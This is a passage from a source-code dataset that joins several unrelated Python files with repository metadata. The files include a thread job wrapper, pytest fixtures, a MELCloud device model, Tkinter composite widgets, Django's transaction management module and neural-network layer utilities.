    INIT = 2     # created but not yet started
    RUNNING = 3  # currently executing
    SUCCESS = 4  # finished without error
class JobTypes(Enum):
    """Different types of jobs to process"""

    BASHJOB = 1  # BashJob: shell command executed via subprocess
    JOB = 2      # Job: plain python callable with args/kwargs
    PIPE = 3     # anything else: assumed to expose run() and state
class ThreadWrapper(Thread):
    """Wrapper around a thread to allow for exception handling and safe
    job execution."""

    def __init__(self, job: Any) -> None:
        """Constructor.

        :param job: Job to run. May be a `Job` (python callable), a
            `BashJob` (shell command) or, by default, any object exposing
            `run()` and `state` (a pipe).
        """
        self._job: Any = job
        if isinstance(job, Job):
            self._jobtype = JobTypes.JOB
            super(ThreadWrapper, self).__init__(target=job.function, args=job.args, kwargs=job.kwargs)
        elif isinstance(job, BashJob):
            # Note that without lambda, subprocess.Popen runs immediately.
            self._jobtype = JobTypes.BASHJOB
            super(ThreadWrapper, self).__init__(target=lambda: subprocess.Popen(job.cmd).wait())
        else:
            # Fallback: treat the job as a pipe driven via its run() method.
            self._jobtype = JobTypes.PIPE
            super(ThreadWrapper, self).__init__(target=job.run)
        self._state = ThreadState.INIT
        self._exception: Optional[Exception] = None

    def run(self) -> None:
        """Runs the thread in an exception free way."""
        try:
            self._state = ThreadState.RUNNING
            super(ThreadWrapper, self).run()
            if self._jobtype == JobTypes.PIPE:
                # A pipe tracks its own success/failure; propagate it.
                self._state = self._job.state
            else:
                self._state = ThreadState.SUCCESS
        except Exception as e:
            # Swallow the exception so the thread terminates cleanly, but
            # keep it for later inspection via the `exception` property.
            self._state = ThreadState.FAILED
            self._exception = e

    @property
    def job(self) -> Any:
        """Job being run by the thread."""
        return self._job

    @property
    def state(self) -> ThreadState:
        """Thread's current state."""
        return self._state

    @property
    def exception(self) -> Optional[Exception]:
        """Exception thrown by thread if any."""
        return self._exception
| 25.747126 | 102 | 0.599554 |
39aa40925c8c3528abd5ae39d94a09117106796a | 868 | py | Python | pytest_cases/tests/issues/test_issue_pytest_70.py | pehala/python-pytest-cases | 59dca923f2fbcfc62884963090abc895c23de8cc | [
"BSD-3-Clause"
] | null | null | null | pytest_cases/tests/issues/test_issue_pytest_70.py | pehala/python-pytest-cases | 59dca923f2fbcfc62884963090abc895c23de8cc | [
"BSD-3-Clause"
] | null | null | null | pytest_cases/tests/issues/test_issue_pytest_70.py | pehala/python-pytest-cases | 59dca923f2fbcfc62884963090abc895c23de8cc | [
"BSD-3-Clause"
] | null | null | null | import pytest
from pytest_cases import fixture_ref, pytest_parametrize_plus, pytest_fixture_plus
@pytest_fixture_plus
@pytest_parametrize_plus("variant", ['A', 'B'])
def book1(variant):
    # Parametrized fixture: produces one fixture value per variant.
    return variant
@pytest.fixture
def book2():
    # Plain (non-parametrized) fixture; returns None.
    return
@pytest_parametrize_plus("name", [
    fixture_ref(book1),
    'hi',
    'ih',
    fixture_ref(book2),
])
def test_get_or_create_book(name):
    # 'name' is either a fixture value (via fixture_ref) or a raw string;
    # the test only exercises id generation, hence the bare print.
    print(name)
def test_synthesis(module_results_dct):
    # Verify the generated test ids of the mixed parametrization above:
    # book1 expands into its two variants, the two raw strings share the
    # "name_is_1to2" union id, and book2 yields a single unparametrized id.
    assert list(module_results_dct) == ['test_get_or_create_book[name_is_book1-A]',
                                        'test_get_or_create_book[name_is_book1-B]',
                                        'test_get_or_create_book[name_is_1to2-hi]',
                                        'test_get_or_create_book[name_is_1to2-ih]',
                                        'test_get_or_create_book[name_is_book2]']
| 27.125 | 83 | 0.624424 |
4ac3295d1ab1ea3cb6487826102dc63341ed421d | 797 | py | Python | data/contacts.py | L-A-V-S/python_training | f34794709931ba2b1c32fa58c9eea6cd6098e3ac | [
"Apache-2.0"
] | 1 | 2020-11-03T20:45:32.000Z | 2020-11-03T20:45:32.000Z | data/contacts.py | L-A-V-S/python_training | f34794709931ba2b1c32fa58c9eea6cd6098e3ac | [
"Apache-2.0"
] | null | null | null | data/contacts.py | L-A-V-S/python_training | f34794709931ba2b1c32fa58c9eea6cd6098e3ac | [
"Apache-2.0"
] | null | null | null | from model.contact import Contact
import random
import string
# Static test data: two fully-populated contacts consumed by the tests.
testdata = [
    Contact(firstname="firstname1", middlename="middlename1", lastname="lastname1", nickname="nickname1"),
    Contact(firstname="firstname2", middlename="middlename2", lastname="lastname2", nickname="nickname2")
]
#def random_string(prefix, maxlen):
# symbols = string.ascii_letters + string.digits + string.punctuation + " "*10
# return prefix + "".join([random.choice(symbols) for i in range(random.randrange(maxlen))])
#testdata = [Contact(firstname="", middlename="", lastname="", nickname="")] + [
# Contact(firstname=random_string("firstname", 10), middlename=random_string("middlename", 20), lastname=random_string("lastname", 20), nickname=random_string("nickname", 20))
# for i in range(5)
#]
| 41.947368 | 178 | 0.720201 |
4ffe06343b1df24303291fca88815b7085792f34 | 7,686 | py | Python | src/melcloud/objects/device.py | gdude2002/melcloud | 6fe0f8ebdd37c83bdc2b2690d29713d2b200d7aa | [
"MIT"
] | 12 | 2018-12-08T18:03:40.000Z | 2021-12-21T17:41:34.000Z | src/melcloud/objects/device.py | gdude2002/melcloud | 6fe0f8ebdd37c83bdc2b2690d29713d2b200d7aa | [
"MIT"
] | 2 | 2020-05-28T18:35:09.000Z | 2020-05-29T08:57:08.000Z | src/melcloud/objects/device.py | gdude2002/melcloud | 6fe0f8ebdd37c83bdc2b2690d29713d2b200d7aa | [
"MIT"
] | 11 | 2018-04-16T11:36:45.000Z | 2021-12-30T22:41:08.000Z | # coding=utf-8
from datetime import datetime
from typing import List
from dataclasses import dataclass
from melcloud.objects.preset import Preset
from melcloud.objects.weather import WeatherObservation
from melcloud.utils import str_to_datetime
__author__ = "Gareth Coles"
@dataclass
class Device:
access_level: int
adaptor_type: int
allow_dual_room_temperature: bool
area_id: int
area_name: str
boiler_status: bool
booster_heater_1_status: bool
booster_heater_2_plus_status: bool
booster_heater_2_status: bool
building_country: int
building_id: int
building_name: str
can_cool: bool
can_estimate_energy_usage: bool
can_heat: bool
can_measure_energy_consumed: bool
can_measure_energy_produced: bool
can_set_eco_hot_water: bool
can_set_flow_temperature: bool
can_set_forced_hot_water: bool
can_set_operation_mode: bool
can_set_power: bool
can_set_tank_temperature: bool
can_set_tank_water_temperature: bool
can_set_temperature_increment_override: bool
can_use_room_temperature_cooling: bool
cooling_energy_consumed_rate_1: int
cooling_energy_consumed_rate_2: int
cooling_energy_produced_rate_1: int
cooling_energy_produced_rate_2: int
CSV_report_1_min: bool
current_energy_consumed: int
current_energy_mode: object # ???
current_energy_produced: int
daily_energy_consumed_date: datetime
daily_energy_produced_date: datetime
date_created: datetime
DECC_report: bool
defrost_mode: int
detected_country: int
device_id: int
device_name: str
device_type: int
diagnostic_end_date: object # ???
diagnostic_mode: int
dip_switch_1: int
dip_switch_2: int
dip_switch_3: int
dip_switch_4: int
direct_access: bool
eco_hot_water: bool
effective_flags: 1
effective_pcycle: int
end_date: datetime
error_code: int
error_code_2_digit: int
expected_command: int
firmware_app_version: int
firmware_deployment: object # ???
firmware_update_aborted: bool
firmware_web_version: int
firmware_wlan_version: int
flash_writes: int
floor_id: int
floor_name: str
flow_temperature: int
flow_temperature_boiler: int
flow_temperature_zone_1: int
flow_temperature_zone_2: int
forced_hot_water_mode: bool
FTC_model: int
FTC_revision: str
FTC_version: int
has_eco_cute_settings: bool
has_energy_consumed_meter: bool
has_energy_produced_meter: bool
has_error: bool
has_error_messages: bool
has_FTC_45_settings: bool
has_hot_water_tank: bool
has_simplified_zone_2: bool
has_thermostat_zone_1: bool
has_thermostat_zone_2: bool
has_zone_2: bool
heating_energy_consumed_rate_1: int
heating_energy_consumed_rate_2: int
heating_energy_produced_rate_1: int
heating_energy_produced_rate_2: int
heating_function_enabled: bool
heat_pump_frequency: int
hide_dry_mode_control: bool
hide_outdoor_temperature: bool
hide_room_temperature: bool
hide_supply_temperature: bool
hide_vane_controls: bool
holiday_mode: bool
hot_water_energy_consumed_rate_1: int
hot_water_energy_consumed_rate_2: int
hot_water_energy_produced_rate_1: int
hot_water_energy_produced_rate_2: int
idle_zone_1: bool
idle_zone_2: bool
image_id: int
immersion_heater_status: bool
installation_date: datetime
is_FTC_model_supported: bool
last_effective_flags: int
last_FTC_revision: str
last_FTC_version: int
last_reset: datetime
last_service_date: datetime
last_time_stamp: datetime
local_ip_address: str
location: int
mac_address: str
max_indoor_units: int
max_outdoor_units: int
max_pcycle: int
max_set_temperature: int
max_tank_temperature: int
max_temperature: int
max_temperature_control_units: int
min_pcycle: int
min_set_temperature: int
min_temperature: int
offline: bool
operation_mode: int
operation_mode_zone_1: int
operation_mode_zone_2: int
outdoor_temperature: int
owner: object # ???
owner_country: int
owner_email: str
owner_id: int
owner_name: str
passcode: object # ???
pcycle: int
pending_request_special_functions: int
pending_send_special_functions: int
position: str
power: bool
prohibit_cooling_zone_1: bool
prohibit_cooling_zone_2: bool
prohibit_heating_zone_1: bool
prohibit_heating_zone_2: bool
prohibit_hot_water: bool
protocol_version: int
rate_1_start_time: object # ???
rate_2_start_time: object # ???
record_num_max: int
refrigerant_address: int
registrations: int
registration_reason: object # ???
registration_retry: object # ???
request_special_functions: int
return_temperature: int
return_temperature_boiler: int
return_temperature_zone_1: int
return_temperature_zone_2: int
room_temperature_zone_1: float
room_temperature_zone_2: float
scene: object # ???
secondary_zone_heat_curve: bool
send_special_functions: int
serial_number: int
server_communication_disabled: bool
server_timer_desired: bool
server_timer_enabled: bool
set_cool_flow_temperature_zone_1: int
set_cool_flow_temperature_zone_2: int
set_heat_flow_temperature_zone_1: int
set_heat_flow_temperature_zone_2: int
set_tank_water_temperature: int
set_temperature_zone_1: int
set_temperature_zone_2: int
special_functions_state: int
SP_timeout: object # ???
SSL_expiration_date: object # ???
tank_water_temperature: int
target_hc_temperature_zone_1: int
target_hc_temperature_zone_2: int
temperature_increment: float
temperature_increment_override: int
thermostat_status_zone_1: bool
thermostat_status_zone_2: bool
thermostat_temperature_zone_1: int
thermostat_temperature_zone_2: int
thermostat_type_zone_1: bool
thermostat_type_zone_2: bool
timezone: int
timezone_id: int
type: int
unit_status: int
unit_version: int
valve_status_2_way: bool
valve_status_2_way_2a: bool
valve_status_2_way_2b: bool
valve_status_3_way: bool
water_pump_1_status: bool
water_pump_2_status: bool
water_pump_3_status: bool
water_pump_4_status: bool
wifi_adapter_status: str # Enum later???
wifi_signal_strength: int
zone_1_in_cool_mode: bool
zone_1_in_heat_mode: bool
zone_1_in_room_mode: bool
zone_1_name: str
zone_2_in_cool_mode: bool
zone_2_in_heat_mode: bool
zone_2_in_room_mode: bool
zone_2_master: bool
zone_2_name: str
presets: List[Preset]
has_pending_command: bool = None
last_communication: datetime = None
next_communication: datetime = None
prohibit_zone1: bool = None
prohibit_zone2: bool = None
scene_owner: object = None # ???
weather_observations: List[WeatherObservation] = None
def update_from_device_info(self, data):
    """Refresh live-state fields from a device-info payload dict."""
    # Reset the observation list (create it on first update).
    if self.weather_observations is None:
        self.weather_observations = []
    else:
        self.weather_observations.clear()
    self.has_pending_command = data["has_pending_command"]
    # Timestamps arrive as strings and are parsed into datetimes.
    self.last_communication = str_to_datetime(data["last_communication"])
    self.next_communication = str_to_datetime(data["next_communication"])
    for field_name in ("prohibit_zone1", "prohibit_zone2", "scene_owner"):
        setattr(self, field_name, data[field_name])
    self.weather_observations.extend(
        WeatherObservation(**obs) for obs in data["weather_observations"]
    )
| 30.141176 | 79 | 0.749024 |
f45c013457f2e9a5333876fe34105550b82152d6 | 4,622 | py | Python | composite.py | junkmd/Python-Tkinter-Widgets | b1f17d64ac7c7e9607722dbb27bbf7db3ac13242 | [
"MIT"
] | 1 | 2020-08-08T09:04:11.000Z | 2020-08-08T09:04:11.000Z | composite.py | junkmd/Python-Tkinter-Widgets | b1f17d64ac7c7e9607722dbb27bbf7db3ac13242 | [
"MIT"
] | null | null | null | composite.py | junkmd/Python-Tkinter-Widgets | b1f17d64ac7c7e9607722dbb27bbf7db3ac13242 | [
"MIT"
] | null | null | null | """Tkinter combination widgets' base classes."""
import tkinter as tk
from tkinter import ttk
# Names of every public geometry-manager method (pack/grid/place),
# excluding the config/configure aliases shared with normal widgets.
TK_GEOMETRY_METHODS = tuple({
    name
    for manager in (tk.Pack, tk.Grid, tk.Place)
    for name in manager.__dict__
    if not name.startswith('_') and name not in ('config', 'configure')
})
class CompositeWidgetError(tk.TclError):
    """Raised when a composite widget is assembled incorrectly."""

    pass
class InteriorAndExterior:
"""Internal class."""
def __init__(self, exterior):
    """Bind this interior widget to its `exterior` container.

    `self` (the interior) must already be a child of `exterior`, and the
    subclass is expected to inherit from a concrete tk widget class
    (checked via mro()[1]).
    """
    self._exterior = exterior
    if self not in exterior.winfo_children():
        raise CompositeWidgetError(
            "Interior must be childrens of Exterior.")
    # Re-export the exterior's geometry methods (pack/grid/place...) so
    # geometry management applies to the outer widget.
    for m in TK_GEOMETRY_METHODS:
        setattr(self, m, getattr(exterior, m))
    self._base = self.__class__.mro()[1]  # Base class of composite widget.
    if not issubclass(self._base, tk.Widget):
        raise CompositeWidgetError(
            "Base class of composite widget "
            "must be subclass of tk.BaseWidget.")
    # Partition option names into common / interior-only / exterior-only.
    inter_keys = self._base.keys(self)
    exter_keys = exterior.keys()
    common_keys = list(set(inter_keys) & set(exter_keys))
    inter_only = list(set(inter_keys) - set(exter_keys))
    exter_only = list(set(exter_keys) - set(inter_keys))
    c_kw, i_kw, e_kw = {}, {}, {}
    for keys, kw in zip(
            [common_keys, inter_only, exter_only],
            [c_kw, i_kw, e_kw]):
        for k in keys:
            # Identity mapping (key -> key); dicts give O(1) membership.
            kw[k] = k
    self._common_kw = c_kw
    self._interior_kw, self._exterior_kw = i_kw, e_kw
    self.winfo_parent = exterior.winfo_parent
    self.config = self.configure = self.__configure
    # NOTE(review): this assigns a *bound* method onto the base class
    # attribute, which is shared by every instance of that base class --
    # presumably only safe with a single composite instance; verify.
    self._base.__setitem__ = self.__setitem
    self.keys = self.__keys
    self.cget = self.__cget
    self._base.__getitem__ = self.__cget
    self.destroy = self.__destroy
def __dispatch_each_options(self, **kw):
"""Internal function.
Returns interior, exterior option."""
inter_opts, exter_opts = {}, {}
for k, v in kw.items():
if k in self._common_kw.keys():
inter_opts[self._common_kw[k]] = kw[k]
exter_opts[self._common_kw[k]] = kw[k]
elif k in self._interior_kw.keys():
inter_opts[self._interior_kw[k]] = kw[k]
elif k in self._exterior_kw.keys():
exter_opts[self._exterior_kw[k]] = kw[k]
else:
raise tk.TclError('unknown option \"%s\"' % ('-' + k, ))
return (inter_opts, exter_opts)
def __destroy(self):
"""Destroy this and all descendants widgets."""
# Destroy self._exterior and its children widgets including interior.
# For avoiding RecursionError,
# removing self(interior) from self._exterior.children and
# destroy the interior and its children widgets
# before self._exterior.destroy() method will destroy the interior.
del_dict = {} # deleting from self._exterior.children dictionary
for k, v in self._exterior.children.items():
if v is self:
del_dict[k] = v
for k, v in del_dict.items():
del self._exterior.children[k]
self._base.destroy(self)
self._exterior.destroy()
def __keys(self):
"""Return a list of all resource names of this widget."""
inter = self._interior_kw.keys()
exter = self._exterior_kw.keys()
common = self._common_kw.keys()
keys = list(set(list(inter) + list(exter) + list(common)))
keys.sort()
return keys
def __configure(self, **kw):
"""Configure resources of a widget.
The values for resources are specified as keyword
arguments. To get an overview about
the allowed keyword arguments call the method keys."""
inter_kw, exter_kw = self.__dispatch_each_options(**kw)
self._exterior.config(**exter_kw)
self._base.config(self, **inter_kw)
def __setitem(self, key, value):
self.__configure(**{key: value})
def __cget(self, key):
"""Return the resource value for a KEY given as string."""
if key in self._common_kw.keys():
return self._base.cget(self, self._common_kw[key])
else:
if key in self._interior_kw.keys():
return self._base.cget(self, self._interior_kw[key])
elif key in self._exterior_kw.keys():
return self._exterior.cget(self._exterior_kw[key])
else:
raise CompositeWidgetError('unknown option \"-%s\"' % key)
| 37.577236 | 79 | 0.599091 |
7061475a3c45c3011b931a16c8e9ca8d9a47be35 | 13,752 | py | Python | django/db/transaction.py | egenerat/gae-django | f12379483cf3917ed3cb46ca5ff0b94daf89fc50 | [
"MIT"
] | 3 | 2016-07-08T23:49:32.000Z | 2018-04-15T22:55:01.000Z | django/db/transaction.py | egenerat/gae-django | f12379483cf3917ed3cb46ca5ff0b94daf89fc50 | [
"MIT"
] | 27 | 2017-02-05T15:57:04.000Z | 2018-04-15T22:57:26.000Z | django/db/transaction.py | egenerat/gae-django | f12379483cf3917ed3cb46ca5ff0b94daf89fc50 | [
"MIT"
] | null | null | null | """
This module implements a transaction manager that can be used to define
transaction handling in a request or view function. It is used by transaction
control middleware and decorators.
The transaction manager can be in managed or in auto state. Auto state means the
system is using a commit-on-save strategy (actually it's more like
commit-on-change). As soon as the .save() or .delete() (or related) methods are
called, a commit is made.
Managed transactions don't do those commits, but will need some kind of manual
or implicit commits or rollbacks.
"""
import sys
try:
import thread
except ImportError:
import dummy_thread as thread
try:
from functools import wraps
except ImportError:
from django.utils.functional import wraps # Python 2.4 fallback.
from django.conf import settings
from django.db import connections, DEFAULT_DB_ALIAS
class TransactionManagementError(Exception):
"""
This exception is thrown when something bad happens with transaction
management.
"""
pass
# The states are dictionaries of dictionaries of lists. The key to the outer
# dict is the current thread, and the key to the inner dictionary is the
# connection alias and the list is handled as a stack of values.
state = {}
savepoint_state = {}
# The dirty flag is set by *_unless_managed functions to denote that the
# code under transaction management has changed things to require a
# database commit.
# This is a dictionary mapping thread to a dictionary mapping connection
# alias to a boolean.
dirty = {}
def enter_transaction_management(managed=True, using=None):
"""
Enters transaction management for a running thread. It must be balanced with
the appropriate leave_transaction_management call, since the actual state is
managed as a stack.
The state and dirty flag are carried over from the surrounding block or
from the settings, if there is no surrounding block (dirty is always false
when no current block is running).
"""
if using is None:
using = DEFAULT_DB_ALIAS
connection = connections[using]
thread_ident = thread.get_ident()
if thread_ident in state and state[thread_ident].get(using):
state[thread_ident][using].append(state[thread_ident][using][-1])
else:
state.setdefault(thread_ident, {})
state[thread_ident][using] = [settings.TRANSACTIONS_MANAGED]
if thread_ident not in dirty or using not in dirty[thread_ident]:
dirty.setdefault(thread_ident, {})
dirty[thread_ident][using] = False
connection._enter_transaction_management(managed)
def leave_transaction_management(using=None):
"""
Leaves transaction management for a running thread. A dirty flag is carried
over to the surrounding block, as a commit will commit all changes, even
those from outside. (Commits are on connection level.)
"""
if using is None:
using = DEFAULT_DB_ALIAS
connection = connections[using]
connection._leave_transaction_management(is_managed(using=using))
thread_ident = thread.get_ident()
if thread_ident in state and state[thread_ident].get(using):
del state[thread_ident][using][-1]
else:
raise TransactionManagementError("This code isn't under transaction management")
if dirty.get(thread_ident, {}).get(using, False):
rollback(using=using)
raise TransactionManagementError("Transaction managed block ended with pending COMMIT/ROLLBACK")
dirty[thread_ident][using] = False
def is_dirty(using=None):
"""
Returns True if the current transaction requires a commit for changes to
happen.
"""
if using is None:
using = DEFAULT_DB_ALIAS
return dirty.get(thread.get_ident(), {}).get(using, False)
def set_dirty(using=None):
"""
Sets a dirty flag for the current thread and code streak. This can be used
to decide in a managed block of code to decide whether there are open
changes waiting for commit.
"""
if using is None:
using = DEFAULT_DB_ALIAS
thread_ident = thread.get_ident()
if thread_ident in dirty and using in dirty[thread_ident]:
dirty[thread_ident][using] = True
else:
raise TransactionManagementError("This code isn't under transaction management")
def set_clean(using=None):
"""
Resets a dirty flag for the current thread and code streak. This can be used
to decide in a managed block of code to decide whether a commit or rollback
should happen.
"""
if using is None:
using = DEFAULT_DB_ALIAS
thread_ident = thread.get_ident()
if thread_ident in dirty and using in dirty[thread_ident]:
dirty[thread_ident][using] = False
else:
raise TransactionManagementError("This code isn't under transaction management")
clean_savepoints(using=using)
def clean_savepoints(using=None):
if using is None:
using = DEFAULT_DB_ALIAS
thread_ident = thread.get_ident()
if thread_ident in savepoint_state and using in savepoint_state[thread_ident]:
del savepoint_state[thread_ident][using]
def is_managed(using=None):
"""
Checks whether the transaction manager is in manual or in auto state.
"""
if using is None:
using = DEFAULT_DB_ALIAS
thread_ident = thread.get_ident()
if thread_ident in state and using in state[thread_ident]:
if state[thread_ident][using]:
return state[thread_ident][using][-1]
return settings.TRANSACTIONS_MANAGED
def managed(flag=True, using=None):
"""
Puts the transaction manager into a manual state: managed transactions have
to be committed explicitly by the user. If you switch off transaction
management and there is a pending commit/rollback, the data will be
commited.
"""
if using is None:
using = DEFAULT_DB_ALIAS
connection = connections[using]
thread_ident = thread.get_ident()
top = state.get(thread_ident, {}).get(using, None)
if top:
top[-1] = flag
if not flag and is_dirty(using=using):
connection._commit()
set_clean(using=using)
else:
raise TransactionManagementError("This code isn't under transaction management")
def commit_unless_managed(using=None):
"""
Commits changes if the system is not in managed transaction mode.
"""
if using is None:
using = DEFAULT_DB_ALIAS
connection = connections[using]
if not is_managed(using=using):
connection._commit()
clean_savepoints(using=using)
else:
set_dirty(using=using)
def rollback_unless_managed(using=None):
"""
Rolls back changes if the system is not in managed transaction mode.
"""
if using is None:
using = DEFAULT_DB_ALIAS
connection = connections[using]
if not is_managed(using=using):
connection._rollback()
else:
set_dirty(using=using)
def commit(using=None):
"""
Does the commit itself and resets the dirty flag.
"""
if using is None:
using = DEFAULT_DB_ALIAS
connection = connections[using]
connection._commit()
set_clean(using=using)
def rollback(using=None):
"""
This function does the rollback itself and resets the dirty flag.
"""
if using is None:
using = DEFAULT_DB_ALIAS
connection = connections[using]
connection._rollback()
set_clean(using=using)
def savepoint(using=None):
"""
Creates a savepoint (if supported and required by the backend) inside the
current transaction. Returns an identifier for the savepoint that will be
used for the subsequent rollback or commit.
"""
if using is None:
using = DEFAULT_DB_ALIAS
connection = connections[using]
thread_ident = thread.get_ident()
if thread_ident in savepoint_state and using in savepoint_state[thread_ident]:
savepoint_state[thread_ident][using].append(None)
else:
savepoint_state.setdefault(thread_ident, {})
savepoint_state[thread_ident][using] = [None]
tid = str(thread_ident).replace('-', '')
sid = "s%s_x%d" % (tid, len(savepoint_state[thread_ident][using]))
connection._savepoint(sid)
return sid
def savepoint_rollback(sid, using=None):
"""
Rolls back the most recent savepoint (if one exists). Does nothing if
savepoints are not supported.
"""
if using is None:
using = DEFAULT_DB_ALIAS
connection = connections[using]
thread_ident = thread.get_ident()
if thread_ident in savepoint_state and using in savepoint_state[thread_ident]:
connection._savepoint_rollback(sid)
def savepoint_commit(sid, using=None):
"""
Commits the most recent savepoint (if one exists). Does nothing if
savepoints are not supported.
"""
if using is None:
using = DEFAULT_DB_ALIAS
connection = connections[using]
thread_ident = thread.get_ident()
if thread_ident in savepoint_state and using in savepoint_state[thread_ident]:
connection._savepoint_commit(sid)
##############
# DECORATORS #
##############
class Transaction(object):
"""
Acts as either a decorator, or a context manager. If it's a decorator it
takes a function and returns a wrapped function. If it's a contextmanager
it's used with the ``with`` statement. In either event entering/exiting
are called before and after, respectively, the function/block is executed.
autocommit, commit_on_success, and commit_manually contain the
implementations of entering and exiting.
"""
def __init__(self, entering, exiting, using):
self.entering = entering
self.exiting = exiting
self.using = using
def __enter__(self):
self.entering(self.using)
def __exit__(self, exc_type, exc_value, traceback):
self.exiting(exc_value, self.using)
def __call__(self, func):
@wraps(func)
def inner(*args, **kwargs):
# Once we drop support for Python 2.4 this block should become:
# with self:
# func(*args, **kwargs)
self.__enter__()
try:
res = func(*args, **kwargs)
except:
self.__exit__(*sys.exc_info())
raise
else:
self.__exit__(None, None, None)
return res
return inner
def _transaction_func(entering, exiting, using):
"""
Takes 3 things, an entering function (what to do to start this block of
transaction management), an exiting function (what to do to end it, on both
success and failure, and using which can be: None, indiciating using is
DEFAULT_DB_ALIAS, a callable, indicating that using is DEFAULT_DB_ALIAS and
to return the function already wrapped.
Returns either a Transaction objects, which is both a decorator and a
context manager, or a wrapped function, if using is a callable.
"""
# Note that although the first argument is *called* `using`, it
# may actually be a function; @autocommit and @autocommit('foo')
# are both allowed forms.
if using is None:
using = DEFAULT_DB_ALIAS
if callable(using):
return Transaction(entering, exiting, DEFAULT_DB_ALIAS)(using)
return Transaction(entering, exiting, using)
def autocommit(using=None):
"""
Decorator that activates commit on save. This is Django's default behavior;
this decorator is useful if you globally activated transaction management in
your settings file and want the default behavior in some view functions.
"""
def entering(using):
enter_transaction_management(managed=False, using=using)
managed(False, using=using)
def exiting(exc_value, using):
leave_transaction_management(using=using)
return _transaction_func(entering, exiting, using)
def commit_on_success(using=None):
"""
This decorator activates commit on response. This way, if the view function
runs successfully, a commit is made; if the viewfunc produces an exception,
a rollback is made. This is one of the most common ways to do transaction
control in Web apps.
"""
def entering(using):
enter_transaction_management(using=using)
managed(True, using=using)
def exiting(exc_value, using):
try:
if exc_value is not None:
if is_dirty(using=using):
rollback(using=using)
else:
if is_dirty(using=using):
try:
commit(using=using)
except:
rollback(using=using)
raise
finally:
leave_transaction_management(using=using)
return _transaction_func(entering, exiting, using)
def commit_manually(using=None):
"""
Decorator that activates manual transaction control. It just disables
automatic transaction control and doesn't do any commit/rollback of its
own -- it's up to the user to call the commit and rollback functions
themselves.
"""
def entering(using):
enter_transaction_management(using=using)
managed(True, using=using)
def exiting(exc_value, using):
leave_transaction_management(using=using)
return _transaction_func(entering, exiting, using)
| 36.28496 | 105 | 0.669066 |
cb2fd4c779152e90b7ffa00aba726562c13975c5 | 2,997 | py | Python | mmdet/models/utils/layer_utils.py | nob87208/LADet | 353cc6bd358de92a2a0242f594b08d15947e7560 | [
"Apache-2.0"
] | 1 | 2020-08-13T02:55:59.000Z | 2020-08-13T02:55:59.000Z | mmdet/models/utils/layer_utils.py | nob87208/LADet | 353cc6bd358de92a2a0242f594b08d15947e7560 | [
"Apache-2.0"
] | null | null | null | mmdet/models/utils/layer_utils.py | nob87208/LADet | 353cc6bd358de92a2a0242f594b08d15947e7560 | [
"Apache-2.0"
] | 2 | 2020-04-13T11:34:24.000Z | 2022-03-29T07:46:27.000Z | import torch
import warnings
import torch.nn as nn
from mmcv.cnn import kaiming_init, constant_init
from .norm import build_norm_layer
def Reorder(x, groups):
batchsize, num_channels, height, width = x.data.size()
channels_per_group = num_channels // groups
# reshape
x = x.view(batchsize, groups,
channels_per_group, height, width)
# transpose
# - contiguous() required if transpose() is used before view().
# See https://github.com/pytorch/pytorch/issues/764
x = torch.transpose(x, 1, 2).contiguous()
# flatten
x = x.view(batchsize, -1, height, width)
return x
class IGCv3_block(nn.Module):
def __init__(self, inp, oup, stride, expand_ratio):
super(IGCv3_block, self).__init__()
self.stride = stride
assert stride in [1, 2]
self.conv = nn.Sequential(
# pw
nn.Conv2d(inp, inp * expand_ratio,kernel_size = 1, stride= 1, padding=0,groups = 2, bias=False),
nn.BatchNorm2d(inp * expand_ratio),
nn.ReLU6(inplace=True),
#permutation
PermutationBlock(groups=2),
# dw
nn.Conv2d(inp * expand_ratio, inp * expand_ratio, kernel_size =3, stride= stride, padding=1, groups=inp * expand_ratio, bias=False),
nn.BatchNorm2d(inp * expand_ratio),
nn.ReLU6(inplace=True),
# pw-linear
nn.Conv2d(inp * expand_ratio, oup, kernel_size =1, stride= 1, padding=0,groups = 2, bias=False),
nn.BatchNorm2d(oup),
# permutation
PermutationBlock(groups= int(round((oup/2)))),
)
def forward(self, x):
return self.conv(x)
class Class_predict(nn.Module):
def __init__(self, feat_channels, num_anchors, cls_out_channels, bn=True):
super(Class_predict, self).__init__()
self.num_anchors = num_anchors
self.cls_out_channels = cls_out_channels
self.bn = bn
self.feat_channels = feat_channels
self.conv1 = nn.Conv2d(
feat_channels,
self.num_anchors * self.cls_out_channels,
(1, 3),
stride=1,
padding=(0, 1),
groups=self.cls_out_channels)
if self.bn:
self.bn1 = nn.BatchNorm2d(self.num_anchors * self.cls_out_channels)
self.conv2 = nn.Conv2d(
self.num_anchors * self.cls_out_channels,
self.num_anchors * self.cls_out_channels,
(3, 1),
stride=1,
padding=(1, 0),
groups=self.cls_out_channels)
def forward(self, x):
y = self.conv1(x)
if self.bn:
y = self.bn1(y)
y = Reorder(y, self.cls_out_channels)
y = self.conv2(y)
return y | 35.258824 | 145 | 0.549883 |
db8a17896202360e73a75a40248e87496bb53e2f | 75 | py | Python | rtsa-gui.py | Sout/pyrf | 6412d5630707632f61cfa2fae8ceafad580a207d | [
"BSD-3-Clause"
] | null | null | null | rtsa-gui.py | Sout/pyrf | 6412d5630707632f61cfa2fae8ceafad580a207d | [
"BSD-3-Clause"
] | null | null | null | rtsa-gui.py | Sout/pyrf | 6412d5630707632f61cfa2fae8ceafad580a207d | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
from pyrf.gui.spectrum_analyzer import main
main()
| 12.5 | 43 | 0.76 |
069578e5c4b11b411ddb05ee3eb20bad769971be | 2,669 | py | Python | 3rd-party/gdcm/Testing/Source/MediaStorageAndFileFormat/Python/TestModifyFields.py | oprogramadorreal/vize | 042c16f96d8790303563be6787200558e1ec00b2 | [
"MIT"
] | 47 | 2020-03-30T14:36:46.000Z | 2022-03-06T07:44:54.000Z | 3rd-party/gdcm/Testing/Source/MediaStorageAndFileFormat/Python/TestModifyFields.py | oprogramadorreal/vize | 042c16f96d8790303563be6787200558e1ec00b2 | [
"MIT"
] | null | null | null | 3rd-party/gdcm/Testing/Source/MediaStorageAndFileFormat/Python/TestModifyFields.py | oprogramadorreal/vize | 042c16f96d8790303563be6787200558e1ec00b2 | [
"MIT"
] | 8 | 2020-04-01T01:22:45.000Z | 2022-01-02T13:06:09.000Z | ############################################################################
#
# Program: GDCM (Grassroots DICOM). A DICOM library
#
# Copyright (c) 2006-2011 Mathieu Malaterre
# All rights reserved.
# See Copyright.txt or http://gdcm.sourceforge.net/Copyright.html for details.
#
# This software is distributed WITHOUT ANY WARRANTY; without even
# the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR
# PURPOSE. See the above copyright notice for more information.
#
############################################################################
